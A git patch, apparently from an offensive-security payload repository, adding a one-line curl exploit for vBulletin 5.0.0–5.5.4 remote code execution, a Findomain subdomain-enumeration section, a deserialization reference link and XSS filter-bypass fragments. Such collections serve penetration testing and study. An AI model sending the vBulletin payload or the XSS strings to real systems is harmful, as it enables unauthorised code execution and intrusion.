From 3221197b1ef9328ece13fc1d5e4369e04faa5f83 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 26 Sep 2019 20:41:01 +0200 Subject: [PATCH] RCE vBulletin + findomain --- CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh | 1 + Insecure Deserialization/README.md | 3 ++- Methodology and Resources/Subdomains Enumeration.md | 12 ++++++++++++ XSS Injection/README.md | 2 ++ 4 files changed, 17 insertions(+), 1 deletion(-) create mode 100644 CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh new file mode 100644 index 0000000..3ebf64a --- /dev/null +++ b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh @@ -0,0 +1 @@ +curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" \ No newline at end of file diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 4a0ed0f..aa05825 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -24,4 +24,5 @@ Check the following sub-sections, located in other files : * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) -* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals \ No newline at end of file +* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals +* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) \ No newline at end of file diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index 0806a99..88ee0e2 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -9,6 +9,7 @@ * EyeWitness * Sublist3r * Subfinder + * Findomain * Aquatone (Ruby and Go versions) * AltDNS * MassDNS @@ -86,6 +87,17 @@ go get github.com/subfinder/subfinder ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ``` +### Using Findomain + +```powershell +$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux +$ chmod +x findomain-linux +$ findomain_spyse_token="YourAccessToken" +$ findomain_virustotal_token="YourAccessToken" +$ findomain_fb_token="YourAccessToken" +$ ./findomain-linux -t example.com -o +``` + ### Using Aquatone - old version (Ruby) ```powershell diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 6bd8aa1..a0ccd8a 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -751,6 +751,8 @@ You don't need to close your tags. ```javascript %26%2397;lert(1) +alert +> ``` ### Bypass using Katana